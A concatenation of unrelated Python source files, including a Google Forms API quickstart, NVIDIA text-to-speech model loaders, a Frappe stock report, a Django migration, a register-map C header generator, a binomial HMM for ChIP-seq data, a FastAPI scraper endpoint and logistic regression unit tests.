"pre_trained_cnn": ModelPreTrainedCNN,
"transformer": ModelTransformer,
}
def get(self, model_type: str, model_params: Dict) -> Model:
if model_type not in self.models_map.keys():
raise ValueError("Model {} is not implemented! \n Implemented models are: {}"
.format(model_type, list(self.models_map.keys())))
return self.models_map[model_type](model_params)
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START forms_quickstart]
from __future__ import print_function
from apiclient import discovery
from httplib2 import Http
from oauth2client import client, file, tools
SCOPES = "https://www.googleapis.com/auth/forms.body"
DISCOVERY_DOC = "https://forms.googleapis.com/$discovery/rest?version=v1"
store = file.Storage('token.json')
creds = None
if not creds or creds.invalid:
flow = client.flow_from_clientsecrets('client_secrets.json', SCOPES)
creds = tools.run_flow(flow, store)
form_service = discovery.build('forms', 'v1', http=creds.authorize(
Http()), discoveryServiceUrl=DISCOVERY_DOC, static_discovery=False)
# Request body for creating a form
NEW_FORM = {
"info": {
"title": "Quickstart form",
}
}
# Request body to add a multiple-choice question
NEW_QUESTION = {
"requests": [{
"createItem": {
"item": {
"title": "In what year did the United States land a mission on the moon?",
"questionItem": {
"question": {
"required": True,
"choiceQuestion": {
"type": "RADIO",
"options": [
{"value": "1965"},
{"value": "1967"},
{"value": "1969"},
{"value": "1971"}
],
"shuffle": True
}
}
},
},
"location": {
"index": 0
}
}
}]
}
# Creates the initial form
result = form_service.forms().create(body=NEW_FORM).execute()
# Adds the question to the form
question_setting = form_service.forms().batchUpdate(formId=result["formId"], body=NEW_QUESTION).execute()
# Prints the result to show the question has been added
get_result = form_service.forms().get(formId=result["formId"]).execute()
print(get_result)
# [END forms_quickstart]
|
"""
[2016-03-02] Challenge #256 [Intermediate] Guess my hat color
https://www.reddit.com/r/dailyprogrammer/comments/48l3u9/20160302_challenge_256_intermediate_guess_my_hat/
#Description
You are the game master of the game "Guess my hat color".
The game goes as following:
- You put a group of `n` people in one row, each facing the same direction
- You assign a collored hat to each person of the group
- Now you let each person guess the color of their own hat, starting with the last person in the row.
There are only 2 colors of hats and each person can only see the color of hats in front of them.
The group wins from the gamemaster if they can win by making only 1 mistake.
The challenge today is to write the logic to make the guess.
The person guessing can only see the persons in front of them (and their hats) and can hear the guesses from the
persons behind them.
They can **NEVER** look behind them or look at their own hat.
#Formal Inputs & Outputs
##Input description
You get the list of hat colors starting with the person in the back and going to the front
###Input 1 - 10 hats
Black
White
Black
Black
White
White
Black
White
White
White
###Input 2 - 11 hats
Black
Black
White
White
Black
Black
White
Black
White
White
White
###Input 3 - 10 hats
Black
Black
Black
Black
Black
Black
Black
Black
Black
White
##Output description
You have to show the guesses of the persons and whether they passed the challenge (they should if your logic is
correct).
#Notes/Hints
Obviously if you return at random `Black` or `White` this won't work. The person units will have to work togheter to
get a result with maximum 1 mistake.
There is no fixed ratio, neither do the participants know what the ratio is.
#An example for the layout
You have 4 people with lined up like this:
Black -> White -> White -> Black
The one in the back can see:
White -> White -> Black
The second one sees:
White -> Black
And so on...
#Bonus
[Here you have a large set (10000 hats)](https://gist.github.com/fvandepitte/8ab2e2ab0e42e3d4c731).
Make sure your program can handle this.
#Finally
Have a good challenge idea?
Consider submitting it to /r/dailyprogrammer_ideas
**EDIT** Added notes
Thanks to /u/355over113 for pointing out a typo
"""
def main():
pass
if __name__ == "__main__":
main()
|
import src.modules.cli as cli
import os
import nltk
nltk.download("all",quiet=True)
dirname = os.path.dirname(__file__)
def test_cli_pdf_similarity():
pdf1 = os.path.join(dirname, 'test_paper/rsos.201199.pdf')
pdf2 = os.path.join(dirname, 'test_paper/rsos.201199.pdf')
cli.pdf_similarity(pdf1, pdf2, False)
def test_snowballing():
cli.snowballing(os.path.join(dirname, 'snowballing_test_seed_set/'))
def test_extract_pdf_references():
pdf1 = os.path.join(dirname, 'test_paper/rsos.201199.pdf')
cli.extract_pdf_references(pdf=pdf1, save_to_file="test_result.json")
def test_extract_keyphrases():
pdf1 = os.path.join(dirname, 'test_paper/rsos.201199.pdf')
cli.extract_keyphrases_pdf(pdf=pdf1)
def test_extract_keywords():
pdf1 = os.path.join(dirname, 'test_paper/rsos.201199.pdf')
cli.extract_keywords_pdf(pdf=pdf1)
def test_paper_selection():
cli.paper_selection([" Conspiracy theories explain complex world events with reference to secret plots hatched by powerful groups. Belief in such theories is largely determined by a general propensity towards conspirational thinking. Such a conspiracy mentality can be understood as a generalised political attitude, distinct from established generalised political attitudes such as right\u2013wing authoritarianism (RWA) and social dominance orientation (SDO) (Study 1a, N = 497) that is temporally relatively stable (Study 1b and 1c, total N = 196). Three further studies (combined N = 854) show that in contrast to RWA and SDO, conspiracy mentality is related to prejudice against high\u2013power groups that are perceived as less likeable and more threatening than low\u2013power groups, whereas SDO and RWA are associated with an opposite reaction to perceptions of power. Study 5 (N = 1852) investigates the relationship of conspiracy mentality with political behavioural intentions in a specific catastrophic scenario (i.e. the damage to the Fukushima nuclear reactor after the 2011 tsunami in Japan) revealing a hitherto neglected role of conspiracy mentality in motivating social action aimed at changing the status quo. Copyright \u00a9 2013 European Association of Personality Psychology. "],["conspiracy", "conspiracy mentality", "social media", "sausage"])
def test_snowballing_paper_selection():
cli.snowballing_paper_selection(snowballing_result_path=os.path.join(dirname,
'../src/modules/snowballing_result.json'), keywords=["conspiracy", "conspiracy mentality", "social media", "sausage"])
def test_summary():
cli.summarization(" Conspiracy theories explain complex world events with reference to secret plots hatched by powerful groups. Belief in such theories is largely determined by a general propensity towards conspirational thinking. Such a conspiracy mentality can be understood as a generalised political attitude, distinct from established generalised political attitudes such as right\u2013wing authoritarianism (RWA) and social dominance orientation (SDO) (Study 1a, N = 497) that is temporally relatively stable (Study 1b and 1c, total N = 196). Three further studies (combined N = 854) show that in contrast to RWA and SDO, conspiracy mentality is related to prejudice against high\u2013power groups that are perceived as less likeable and more threatening than low\u2013power groups, whereas SDO and RWA are associated with an opposite reaction to perceptions of power. Study 5 (N = 1852) investigates the relationship of conspiracy mentality with political behavioural intentions in a specific catastrophic scenario (i.e. the damage to the Fukushima nuclear reactor after the 2011 tsunami in Japan) revealing a hitherto neglected role of conspiracy mentality in motivating social action aimed at changing the status quo. Copyright \u00a9 2013 European Association of Personality Psychology.")
|
# *****************************************************************************
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the NVIDIA CORPORATION nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# *****************************************************************************
import sys
from typing import Optional
from os.path import abspath, dirname
import torch
# enabling modules discovery from global entrypoint
sys.path.append(abspath(dirname(__file__)+'/'))
from fastpitch.model import FastPitch as _FastPitch
from fastpitch.model_jit import FastPitch as _FastPitchJIT
from tacotron2.model import Tacotron2
from waveglow.model import WaveGlow
from common.text.symbols import get_symbols, get_pad_idx
def parse_model_args(model_name, parser, add_help=False):
if model_name == 'Tacotron2':
from tacotron2.arg_parser import parse_tacotron2_args
return parse_tacotron2_args(parser, add_help)
if model_name == 'WaveGlow':
from waveglow.arg_parser import parse_waveglow_args
return parse_waveglow_args(parser, add_help)
elif model_name == 'FastPitch':
from fastpitch.arg_parser import parse_fastpitch_args
return parse_fastpitch_args(parser, add_help)
else:
raise NotImplementedError(model_name)
def batchnorm_to_float(module):
"""Converts batch norm to FP32"""
if isinstance(module, torch.nn.modules.batchnorm._BatchNorm):
module.float()
for child in module.children():
batchnorm_to_float(child)
return module
def init_bn(module):
if isinstance(module, torch.nn.modules.batchnorm._BatchNorm):
if module.affine:
module.weight.data.uniform_()
for child in module.children():
init_bn(child)
def get_model(model_name, model_config, device,
uniform_initialize_bn_weight=False, forward_is_infer=False,
jitable=False):
""" Code chooses a model based on name"""
model = None
if model_name == 'Tacotron2':
if forward_is_infer:
class Tacotron2__forward_is_infer(Tacotron2):
def forward(self, inputs, input_lengths):
return self.infer(inputs, input_lengths)
model = Tacotron2__forward_is_infer(**model_config)
else:
model = Tacotron2(**model_config)
elif model_name == 'WaveGlow':
if forward_is_infer:
class WaveGlow__forward_is_infer(WaveGlow):
def forward(self, spect, sigma=1.0):
return self.infer(spect, sigma)
model = WaveGlow__forward_is_infer(**model_config)
else:
model = WaveGlow(**model_config)
elif model_name == 'FastPitch':
if forward_is_infer:
if jitable:
class FastPitch__forward_is_infer(_FastPitchJIT):
def forward(self, inputs, input_lengths, pace: float = 1.0,
dur_tgt: Optional[torch.Tensor] = None,
pitch_tgt: Optional[torch.Tensor] = None,
speaker: int = 0):
return self.infer(inputs, input_lengths, pace=pace,
dur_tgt=dur_tgt, pitch_tgt=pitch_tgt,
speaker=speaker)
else:
class FastPitch__forward_is_infer(_FastPitch):
def forward(self, inputs, input_lengths, pace: float = 1.0,
dur_tgt: Optional[torch.Tensor] = None,
pitch_tgt: Optional[torch.Tensor] = None,
pitch_transform=None,
speaker: Optional[int] = None):
return self.infer(inputs, input_lengths, pace=pace,
dur_tgt=dur_tgt, pitch_tgt=pitch_tgt,
pitch_transform=pitch_transform,
speaker=speaker)
model = FastPitch__forward_is_infer(**model_config)
else:
model = _FastPitch(**model_config)
else:
raise NotImplementedError(model_name)
if uniform_initialize_bn_weight:
init_bn(model)
return model.to(device)
def get_model_config(model_name, args):
""" Code chooses a model based on name"""
if model_name == 'Tacotron2':
model_config = dict(
# optimization
mask_padding=args.mask_padding,
# audio
n_mel_channels=args.n_mel_channels,
# symbols
n_symbols=len(get_symbols(args.symbol_set)),
symbols_embedding_dim=args.symbols_embedding_dim,
# encoder
encoder_kernel_size=args.encoder_kernel_size,
encoder_n_convolutions=args.encoder_n_convolutions,
encoder_embedding_dim=args.encoder_embedding_dim,
# attention
attention_rnn_dim=args.attention_rnn_dim,
attention_dim=args.attention_dim,
# attention location
attention_location_n_filters=args.attention_location_n_filters,
attention_location_kernel_size=args.attention_location_kernel_size,
# decoder
n_frames_per_step=args.n_frames_per_step,
decoder_rnn_dim=args.decoder_rnn_dim,
prenet_dim=args.prenet_dim,
max_decoder_steps=args.max_decoder_steps,
gate_threshold=args.gate_threshold,
p_attention_dropout=args.p_attention_dropout,
p_decoder_dropout=args.p_decoder_dropout,
# postnet
postnet_embedding_dim=args.postnet_embedding_dim,
postnet_kernel_size=args.postnet_kernel_size,
postnet_n_convolutions=args.postnet_n_convolutions,
decoder_no_early_stopping=args.decoder_no_early_stopping,
)
return model_config
elif model_name == 'WaveGlow':
model_config = dict(
n_mel_channels=args.n_mel_channels,
n_flows=args.flows,
n_group=args.groups,
n_early_every=args.early_every,
n_early_size=args.early_size,
WN_config=dict(
n_layers=args.wn_layers,
kernel_size=args.wn_kernel_size,
n_channels=args.wn_channels
)
)
return model_config
elif model_name == 'FastPitch':
model_config = dict(
# io
n_mel_channels=args.n_mel_channels,
max_seq_len=args.max_seq_len,
# symbols
n_symbols=len(get_symbols(args.symbol_set)),
padding_idx=get_pad_idx(args.symbol_set),
symbols_embedding_dim=args.symbols_embedding_dim,
# input FFT
in_fft_n_layers=args.in_fft_n_layers,
in_fft_n_heads=args.in_fft_n_heads,
in_fft_d_head=args.in_fft_d_head,
in_fft_conv1d_kernel_size=args.in_fft_conv1d_kernel_size,
in_fft_conv1d_filter_size=args.in_fft_conv1d_filter_size,
in_fft_output_size=args.in_fft_output_size,
p_in_fft_dropout=args.p_in_fft_dropout,
p_in_fft_dropatt=args.p_in_fft_dropatt,
p_in_fft_dropemb=args.p_in_fft_dropemb,
# output FFT
out_fft_n_layers=args.out_fft_n_layers,
out_fft_n_heads=args.out_fft_n_heads,
out_fft_d_head=args.out_fft_d_head,
out_fft_conv1d_kernel_size=args.out_fft_conv1d_kernel_size,
out_fft_conv1d_filter_size=args.out_fft_conv1d_filter_size,
out_fft_output_size=args.out_fft_output_size,
p_out_fft_dropout=args.p_out_fft_dropout,
p_out_fft_dropatt=args.p_out_fft_dropatt,
p_out_fft_dropemb=args.p_out_fft_dropemb,
# duration predictor
dur_predictor_kernel_size=args.dur_predictor_kernel_size,
dur_predictor_filter_size=args.dur_predictor_filter_size,
p_dur_predictor_dropout=args.p_dur_predictor_dropout,
dur_predictor_n_layers=args.dur_predictor_n_layers,
# pitch predictor
pitch_predictor_kernel_size=args.pitch_predictor_kernel_size,
pitch_predictor_filter_size=args.pitch_predictor_filter_size,
p_pitch_predictor_dropout=args.p_pitch_predictor_dropout,
pitch_predictor_n_layers=args.pitch_predictor_n_layers,
# pitch conditioning
pitch_embedding_kernel_size=args.pitch_embedding_kernel_size,
# speakers parameters
n_speakers=args.n_speakers,
speaker_emb_weight=args.speaker_emb_weight
)
return model_config
else:
raise NotImplementedError(model_name)
|
# Copyright (c) 2013, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
def execute(filters=None):
if not filters: filters = {}
validate_filters(filters)
columns = get_columns()
stock = get_total_stock(filters)
return columns, stock
def get_columns():
columns = [
_("Company") + ":Link/Company:250",
_("Warehouse") + ":Link/Warehouse:150",
_("Item") + ":Link/Item:150",
_("Description") + "::300",
_("Current Qty") + ":Float:100",
]
return columns
def get_total_stock(filters):
conditions = ""
columns = ""
if filters.get("group_by") == "Warehouse":
if filters.get("company"):
conditions += " AND warehouse.company = %s" % frappe.db.escape(filters.get("company"), percent=False)
conditions += " GROUP BY ledger.warehouse, item.item_code"
columns += "'' as company, ledger.warehouse"
else:
conditions += " GROUP BY warehouse.company, item.item_code"
columns += " warehouse.company, '' as warehouse"
return frappe.db.sql("""
SELECT
%s,
item.item_code,
item.description,
sum(ledger.actual_qty) as actual_qty
FROM
`tabBin` AS ledger
INNER JOIN `tabItem` AS item
ON ledger.item_code = item.item_code
INNER JOIN `tabWarehouse` warehouse
ON warehouse.name = ledger.warehouse
WHERE
actual_qty != 0 %s""" % (columns, conditions))
def validate_filters(filters):
if filters.get("group_by") == 'Company' and \
filters.get("company"):
frappe.throw(_("Please set Company filter blank if Group By is 'Company'"))
|
# Generated by Django 3.0.5 on 2020-04-26 13:00
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('covidus_main', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='profile',
name='temperature',
),
migrations.AddField(
model_name='profile',
name='temperature_pills',
field=models.CharField(choices=[('34.0', 'Normal'), ('37.5 - 38.0°C', 'Low Fever'), ('38.1-39.0°C', 'High Fever'), ('>39.0°C', 'Very High Fever')], default=None, max_length=20),
),
migrations.AlterField(
model_name='profile',
name='age',
field=models.IntegerField(),
),
migrations.AlterField(
model_name='profile',
name='current_postalcode',
field=models.IntegerField(),
),
migrations.AlterField(
model_name='profile',
name='height',
field=models.IntegerField(),
),
migrations.AlterField(
model_name='profile',
name='postal_code',
field=models.IntegerField(),
),
migrations.AlterField(
model_name='profile',
name='weight',
field=models.IntegerField(),
),
]
|
"""
Copyright (c) 2020-2021 Deutsches Elektronen-Synchrotron DESY.
See LICENSE.txt for license details.
"""
import datetime
import getpass
import os
import socket
from typing import Iterator, List, Optional
from systemrdl.rdltypes import AccessType
from hectare._hectare_types import AddressMap, Field, Register
def indent_lines(ls: List[str], ident_level: int) -> Iterator[str]:
for l in ls:
yield " " * ident_level + l
class HectareCHeaderGen:
def __init__(self, addrmap, input_filename=""):
self.addrmap = addrmap
self.cur_indent = 0
self.data_w_bytes = 4 # 32 / 8 # TODO check regwidth
self.input_filename = input_filename
def generate_string(self) -> str:
s = ""
s += self._gen_header(self.input_filename)
s += "\n"
s += "#pragma once\n"
s += "\n\n// address constants\n"
s += "\n".join(self._gen_reg_addr())
s += "\n"
s += "\n\n// reset values\n"
s += "\n".join(self._gen_reg_reset_vals())
s += "\n\n// individual field shift\n"
s += "\n".join(self._gen_field_shift())
s += "\n\n// individual field mask\n"
s += "\n".join(self._gen_field_mask())
return s
@staticmethod
def _gen_header(input_filename: str, verbose: bool = False) -> str:
s = "/* This file was automatically generated with HECTARE\n"
s += " *\n"
s += " * DO NOT EDIT\n"
s += " *\n"
s += " * input_filename = {0}\n".format(input_filename)
if verbose:
s += " * date = {0}\n".format(datetime.datetime.now().ctime())
s += " * hostname = {0}\n".format(socket.gethostname())
s += " * user = {0}\n".format(getpass.getuser())
s += " */\n"
return s
def _gen_reg_addr(self) -> List[str]:
comp_name = self.addrmap.name.upper()
return [self._gen_single_addr(comp_name, reg) for reg in self.addrmap.regs]
def _gen_reg_reset_vals(self) -> List[str]:
# we only generate those for the values with hw=na, sw=r
comp_name = self.addrmap.name.upper()
reset_vals = []
for reg in self.addrmap.regs:
line_added = False
for field in reg.fields:
if field.sw_acc_type == AccessType.r and field.hw_acc_type == AccessType.na:
reset_vals.append(self._gen_single_reg_reset_vals(comp_name, reg.name, field))
line_added = True
# to make this prettier, we only add an empty line after a group of "#define"-s
if line_added:
line_added = False
reset_vals.append("")
return reset_vals
def _gen_field_shift(self) -> List[str]:
comp_name = self.addrmap.name.upper()
field_shifts = []
for reg in self.addrmap.regs:
for field in reg.fields:
field_shifts.append(
self._gen_single_field_shift(comp_name, reg.name, field)
)
field_shifts.append("")
return field_shifts
def _gen_field_mask(self) -> List[str]:
comp_name = self.addrmap.name.upper()
field_mask = []
for reg in self.addrmap.regs:
for field in reg.fields:
field_mask.append(
self._gen_single_field_mask(comp_name, reg.name, field)
)
field_mask.append("")
return field_mask
@staticmethod
def _gen_single_enum_type(field: Field) -> str:
# TODO
pass
@staticmethod
def _gen_single_addr(comp_name: str, reg: Register) -> str:
""" Generate an address constant for a single register
E.g. #define MOD_ADDR_SCRATCH (0x1C)
"""
return "#define {comp_name}_ADDR_{name} ({byte_addr})".format(
comp_name=comp_name, name=reg.name.upper(), byte_addr=reg.addr
)
@staticmethod
def _gen_single_reg_reset_vals(comp_name: str, reg_name: str, field: Field) -> str:
""" Generate a reset values (can be used to check if matches in SW)
this functions expects that a field has a reset value
"""
assert field.reset is not None
return "#define {comp_name}_{reg_name}_{field_name}_RST_VAL (0x{rst_val:x})".format(
comp_name=comp_name,
reg_name=reg_name,
field_name=field.name.upper(),
rst_val=field.reset,
)
@staticmethod
def _gen_single_field_shift(comp_name: str, reg_name: str, field: Field) -> str:
return "#define {comp_name}_{reg_name}_{field_name}_SHIFT ({shift})".format(
comp_name=comp_name,
reg_name=reg_name,
field_name=field.name.upper(),
shift=field.lsb,
)
@staticmethod
def _gen_single_field_mask(comp_name: str, reg_name: str, field: Field) -> str:
mask = (1 << (field.msb - field.lsb + 1)) - 1
return "#define {comp_name}_{reg_name}_{field_name}_MASK (0x{mask:x})".format(
comp_name=comp_name,
reg_name=reg_name,
field_name=field.name.upper(),
mask=mask,
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
THOR detects differential peaks in multiple ChIP-seq profiles associated
with two distinct biological conditions.
Copyright (C) 2014-2016 Manuel Allhoff (allhoff@aices.rwth-aachen.de)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
@author: Manuel Allhoff
"""
from __future__ import print_function
import sys
import string
import numpy as np
from scipy.stats import binom
from hmmlearn.hmm import _BaseHMM
from help_hmm import _valid_posteriors
def get_init_parameters(s1, s2, **info):
n_ = np.array([info['count'], info['count']])
#get observation that occurs most often:
m_ =[float(np.argmax(np.bincount(map(lambda x: x[0], s1)))), float(np.argmax(np.bincount(map(lambda x: x[1], s2)))) ]
p_ = [[-1,-1,-1],[-1,-1,-1]] #first: 1. or 2. emission, second: state
p_[0][0] = 1. / n_[0]
p_[1][0] = 1. / n_[1]
p_[0][1] = m_[0] / n_[0]
p_[1][1] = p_[1][0]
p_[0][2] = p_[0][0]
p_[1][2] = m_[1] / n_[1]
return np.asarray(n_), np.asarray(p_)
class BinomialHMM(_BaseHMM):
def __init__(self, n, p, dim_cond_1, dim_cond_2, init_state_seq=None, n_components=2, covariance_type='diag', startprob_prior=None, transmat_prior=None,
algorithm="viterbi", means_prior=None, means_weight=0,
covars_prior=1e-2, covars_weight=1,
random_state=None, n_iter=10, thresh=1e-2,
params=string.ascii_letters,
init_params=string.ascii_letters):
_BaseHMM.__init__(self, n_components,
startprob_prior=startprob_prior,
transmat_prior=transmat_prior, algorithm=algorithm,
random_state=random_state, n_iter=n_iter,
tol=thresh, params=params,
init_params=init_params)
self.dim = [dim_cond_1, dim_cond_2] #dimension of one emission
self.n = n
self.p = p
self.n_features = 2 #emission dimension
self.init_state_seq = init_state_seq
self.count_s1, self.count_s2 = 0, 0
self.lookup_logpmf = {}
def _compute_log_likelihood(self, X):
res = []
for x in X: #over all observations
row = []
for i in range(self.n_components): #over number of HMM's state
r_sum = 0
for j in range(self.n_features): #over dim
it = range(self.dim[0]) if j == 0 else range(self.dim[0], self.dim[0] + self.dim[1]) #grab proper observation
for k in it:
index = (int(x[k]), self.p[j][i], self.n[j])
if not self.lookup_logpmf.has_key( index ):
self.lookup_logpmf[index] = binom.logpmf(x[k], self.n[j], self.p[j][i])
r_sum += self.lookup_logpmf[index]
row.append(r_sum)
res.append(row)
return np.asarray(res)
def _generate_sample_from_state(self, state, random_state=None):
output = []
for i, d in enumerate(self.dim):
for _ in range(d):
output.append( binom.rvs(self.n[i], self.p[i][state]) )
return np.asarray(output)
def _initialize_sufficient_statistics(self):
stats = super(BinomialHMM, self)._initialize_sufficient_statistics()
stats['post'] = np.zeros([self.n_components])
stats['post_emission'] = np.zeros([self.n_features, self.n_components])
return stats
def _help_accumulate_sufficient_statistics(self, obs, stats, posteriors):
for t, symbol in enumerate(obs):
pot_it = [range(self.dim[0]), range(self.dim[0], self.dim[0] + self.dim[1])] #consider both classes
for j, it in enumerate(pot_it):
for i in it:
stats['post'] += posteriors[t]
stats['post_emission'][j] += posteriors[t] * symbol[i]
stats['posterior'] = np.copy(posteriors)
def _accumulate_sufficient_statistics(self, stats, obs, framelogprob,
posteriors, fwdlattice, bwdlattice
):
super(BinomialHMM, self)._accumulate_sufficient_statistics(
stats, obs, framelogprob, posteriors, fwdlattice, bwdlattice
)
posteriors = _valid_posteriors(posteriors, obs, self.dim)
self._help_accumulate_sufficient_statistics(obs, stats, posteriors)
def _add_pseudo_counts(arr):
if type(arr) is np.ndarray:
tmp = np.array([1e-323 if x < 1e-323 else x for x in arr], np.float64)
# tmp2 = np.array([1.0 - 1.0e-5 if x == 1.0 else x for x in tmp], np.float64)
return tmp
else:
tmp = 1e-323 if arr < 1e-323 else arr
# tmp2 = 1.0 - 1.0e-10 if tmp == 1.0 else tmp
return tmp
def _help_do_mstep(self, stats):
for i in range(self.n_features):
self.p[i] = stats['post_emission'][i] / (self.n[i] * self._add_pseudo_counts(stats['post']))
print('help_m_step', i, stats['post_emission'][i], stats['post'], self.p[i], file=sys.stderr)
def _do_mstep(self, stats):
super(BinomialHMM, self)._do_mstep(stats)
self._help_do_mstep(stats)
self.p[0,0] = self.p[1,0]
self.p[0,1] = self.p[1,2]
self.p[1,1] = self.p[0,2]
if __name__ == '__main__':
p_ = np.array([[0.01, 0.8, 0.1], [0.01, 0.1, 0.8]])
n_ = np.array([100, 100])
m = BinomialHMM(n_components=3, p = p_, startprob=[1,0,0], n = n_, dim_cond_1=2, dim_cond_2=4)
X, Z = m.sample(100) #returns (obs, hidden_states)
p_ = np.array([[0.1, 0.7, 0.3], [0.1, 0.2, 0.9]])
n_ = np.array([100, 100])
m2 = BinomialHMM(n_components=3, n=n_, p=p_, dim_cond_1=2, dim_cond_2=4)
#cProfile.run("m2.fit([X])")
m2.fit([X])
e = m2.predict(X)
print(m2.p)
for i, el in enumerate(X):
print(el, Z[i], e[i], Z[i] == e[i], sep='\t')
# logprob, posteriors = m2.eval(X)
# print('logprob:', logprob)
# print('posteriors:', posteriors)
# print('estim. states ', m2.predict(X))
# print(m2.predict_proba(X))
# print(m2.n)
# print(m2.p)
# print(m2._get_transmat())
# init_state = m2.predict(X)
# m3 = BinomialHMM2d3s(n_components=3, n=n_)
# m3.fit([X], init_params='advanced')
# print(m3._get_transmat())
# print(m3.p)
# m2.eval(X)
|
from __future__ import annotations
from typing import Optional
from jsonclasses import jsonclass, types
@jsonclass
class SimpleWordbook:
name: Optional[str]
words: list[str] = types.nonnull.listof(str)
|
from datetime import date
from typing import Optional
from fastapi import FastAPI
from fastapi.responses import RedirectResponse
from road_data_scraper import __version__
from road_data_scraper.main import run
app = FastAPI(
title="Road Data Scraper API",
description="Scrapes and Cleans WebTRIS Traffic Flow API",
version=__version__,
)
@app.get("/", tags=["Road Data Scraper"])
def read_docs():
return RedirectResponse("/docs")
@app.get("/scrape/", tags=["Road Data Scraper"])
def scrape_webtris_api(
test_run: bool,
generate_report: bool,
output_path: str,
rm_dir: bool,
gcp_storage: bool,
start_date: Optional[date] = "",
end_date: Optional[date] = "",
gcp_credentials: Optional[str] = None,
gcp_bucket_name: Optional[str] = None,
gcp_blob_name: Optional[str] = "landing_zone",
):
config = {
"user_settings": {
"start_date": str(start_date),
"end_date": str(end_date),
"test_run": test_run,
"generate_report": generate_report,
"output_path": output_path,
"rm_dir": rm_dir,
"gcp_storage": gcp_storage,
"gcp_credentials": gcp_credentials,
"gcp_bucket_name": gcp_bucket_name,
"gcp_blob_name": gcp_blob_name,
}
}
run(config, api_run=True)
return "WebTRIS Scraping Pipeline Successfully Executed."
|
import sys
from karp5 import instance_info
from .config import Config
from .configmanager import ConfigManager
# print(f"{instance_info.get_instance_path()}")
mgr = ConfigManager(instance_info.get_instance_path())
conf_mgr = mgr
|
"""
Write your logreg unit tests here. Some examples of tests we will be looking for include:
* check that fit appropriately trains model & weights get updated
* check that predict is working
More details on potential tests below, these are not exhaustive
"""
import numpy as np
import pandas as pd
from regression import (logreg, utils)
from sklearn.preprocessing import StandardScaler
def test_updates():
"""
Check training of the model
"""
np.random.seed(42) #set random seed for reproducibility
#create a logistic regression object with the following data
X_train, X_val, y_train, y_val = utils.loadDataset(features=['Penicillin V Potassium 500 MG',
'Computed tomography of chest and abdomen',
'Plain chest X-ray (procedure)',
'Low Density Lipoprotein Cholesterol',
'Creatinine',
'AGE_DIAGNOSIS'],
split_percent=0.8, split_state=42)
# scale data since values vary across features
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_val = sc.transform (X_val)
#create object
log_model = logreg.LogisticRegression(num_feats=6, max_iter=150, tol=0.0001, learning_rate=0.05, batch_size=12)
#train model
log_model.train_model(X_train, y_train, X_val, y_val)
#Check that your gradient is being calculated correctly
gradients = log_model.grad_history #get the stored gradient steps
#assert that the first array of gradients is not the same as the last array of gradients (i.e. assert that the gradients changed)
comparison = gradients[0]==gradients[len(gradients)-1]
arrays_are_equal = comparison.all() #compares all array values to make sure they are equal at the same indices
assert arrays_are_equal==False
#Check that your loss function is correct and that you have reasonable losses at the end of training
#i.e. check that the min training and validation loss are under 3 and 200, respectively with the given hyperparameters
assert min(log_model.loss_history_train)<5
assert min(log_model.loss_history_val)<200
#Check to see if your training losses approach zero (look at the loss_history_train vector) and are generally decreasing
prev_num = 0.0
current_num = 0.0
for i in range(0,len(log_model.loss_history_train)):
current_num = log_model.loss_history_train[i]
#tends to stabilize around i=200, so start checking for decreasing values there
if i>200:
assert current_num<prev_num
prev_num = current_num
def test_predict():
"""
Check testing of the model
"""
np.random.seed(42) #set random seed for reproducibility
#create a logistic regression object with the following data
X_train, X_val, y_train, y_val = utils.loadDataset(features=['Penicillin V Potassium 500 MG',
'Computed tomography of chest and abdomen',
'Plain chest X-ray (procedure)',
'Low Density Lipoprotein Cholesterol',
'Creatinine',
'AGE_DIAGNOSIS'],
split_percent=0.8, split_state=42)
# scale data since values vary across features
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_val = sc.transform (X_val)
#create object
log_model = logreg.LogisticRegression(num_feats=6, max_iter=150, tol=0.0001, learning_rate=0.05, batch_size=12)
original_weights = log_model.W #capture initialized weights
#train model
log_model.train_model(X_train, y_train, X_val, y_val)
new_weights = log_model.W #capture final weights
